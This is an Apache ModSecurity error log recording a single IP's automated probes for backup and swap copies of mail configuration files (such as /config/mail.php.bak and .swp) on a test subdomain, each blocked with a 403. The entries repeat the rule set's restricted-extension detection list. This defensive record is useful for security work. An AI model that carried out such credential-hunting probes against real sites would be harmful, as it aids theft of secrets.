[Fri Jan 16 03:21:06.646989 2026] [:error] [pid 1444034] [client 45.148.10.246:40862] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkuRfEYyDES-ZFL4iqgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.bak
[Fri Jan 16 03:21:06.647169 2026] [:error] [pid 1444034] [client 45.148.10.246:40862] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgkuRfEYyDES-ZFL4iqgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.bak
[Fri Jan 16 03:21:06.783615 2026] [:error] [pid 1444033] [client 45.148.10.246:40864] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgktLJkp65ULFQ2YYixAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.bak
[Fri Jan 16 03:21:06.783953 2026] [:error] [pid 1444033] [client 45.148.10.246:40864] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgktLJkp65ULFQ2YYixAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.bak
[Fri Jan 16 03:21:06.784110 2026] [:error] [pid 1444033] [client 45.148.10.246:40864] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.bak"] [unique_id "aWmgktLJkp65ULFQ2YYixAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.bak
[Fri Jan 16 03:21:07.627405 2026] [:error] [pid 1444034] [client 45.148.10.246:40922] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk-RfEYyDES-ZFL4iqwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.old
[Fri Jan 16 03:21:07.627731 2026] [:error] [pid 1444034] [client 45.148.10.246:40922] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk-RfEYyDES-ZFL4iqwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.old
[Fri Jan 16 03:21:07.627889 2026] [:error] [pid 1444034] [client 45.148.10.246:40922] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk-RfEYyDES-ZFL4iqwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.old
[Fri Jan 16 03:21:07.944846 2026] [:error] [pid 1444226] [client 45.148.10.246:40946] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk2cpoCUgeFICb0bf5QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.old
[Fri Jan 16 03:21:07.945265 2026] [:error] [pid 1444226] [client 45.148.10.246:40946] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk2cpoCUgeFICb0bf5QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.old
[Fri Jan 16 03:21:07.945434 2026] [:error] [pid 1444226] [client 45.148.10.246:40946] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.old"] [unique_id "aWmgk2cpoCUgeFICb0bf5QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.old
[Fri Jan 16 03:21:11.601065 2026] [:error] [pid 1444034] [client 45.148.10.246:45460] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl-RfEYyDES-ZFL4irgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.swp
[Fri Jan 16 03:21:11.601415 2026] [:error] [pid 1444034] [client 45.148.10.246:45460] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl-RfEYyDES-ZFL4irgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.swp
[Fri Jan 16 03:21:11.601638 2026] [:error] [pid 1444034] [client 45.148.10.246:45460] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl-RfEYyDES-ZFL4irgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/mail.php.swp
[Fri Jan 16 03:21:11.856203 2026] [:error] [pid 1444226] [client 45.148.10.246:45472] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl2cpoCUgeFICb0bf6AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.swp
[Fri Jan 16 03:21:11.856528 2026] [:error] [pid 1444226] [client 45.148.10.246:45472] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl2cpoCUgeFICb0bf6AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.swp
[Fri Jan 16 03:21:11.856689 2026] [:error] [pid 1444226] [client 45.148.10.246:45472] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgl2cpoCUgeFICb0bf6AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/mail.php.swp
[Fri Jan 16 03:21:12.043574 2026] [:error] [pid 1444032] [client 45.148.10.246:45480] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgmOkMvq8uPO2ZciWrRAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.swp
[Fri Jan 16 03:21:12.043936 2026] [:error] [pid 1444032] [client 45.148.10.246:45480] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgmOkMvq8uPO2ZciWrRAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.swp
[Fri Jan 16 03:21:12.044119 2026] [:error] [pid 1444032] [client 45.148.10.246:45480] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/mail.php.swp"] [unique_id "aWmgmOkMvq8uPO2ZciWrRAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./config/mail.php.swp
[Fri Jan 16 03:21:12.219071 2026] [:error] [pid 1444040] [client 45.148.10.246:45482] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmPn_5sIyKhJ5GAza1gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.bak
[Fri Jan 16 03:21:12.219395 2026] [:error] [pid 1444040] [client 45.148.10.246:45482] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmPn_5sIyKhJ5GAza1gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.bak
[Fri Jan 16 03:21:12.219548 2026] [:error] [pid 1444040] [client 45.148.10.246:45482] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmPn_5sIyKhJ5GAza1gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.bak
[Fri Jan 16 03:21:12.508938 2026] [:error] [pid 1444034] [client 45.148.10.246:45506] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmORfEYyDES-ZFL4irwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.bak
[Fri Jan 16 03:21:12.509263 2026] [:error] [pid 1444034] [client 45.148.10.246:45506] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmORfEYyDES-ZFL4irwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.bak
[Fri Jan 16 03:21:12.509422 2026] [:error] [pid 1444034] [client 45.148.10.246:45506] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmORfEYyDES-ZFL4irwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//config/email.php.bak
[Fri Jan 16 03:21:12.637614 2026] [:error] [pid 1444033] [client 45.148.10.246:45518] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmNLJkp65ULFQ2YYiyQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.bak
[Fri Jan 16 03:21:12.637954 2026] [:error] [pid 1444033] [client 45.148.10.246:45518] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmNLJkp65ULFQ2YYiyQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.bak
[Fri Jan 16 03:21:12.638135 2026] [:error] [pid 1444033] [client 45.148.10.246:45518] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.bak"] [unique_id "aWmgmNLJkp65ULFQ2YYiyQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./config/email.php.bak
[Fri Jan 16 03:21:13.374029 2026] [:error] [pid 1444034] [client 45.148.10.246:45566] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmeRfEYyDES-ZFL4isAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.old
[Fri Jan 16 03:21:13.374431 2026] [:error] [pid 1444034] [client 45.148.10.246:45566] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/email.php.old"] [unique_id "aWmgmeRfEYyDES-ZFL4isAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/email.php.old
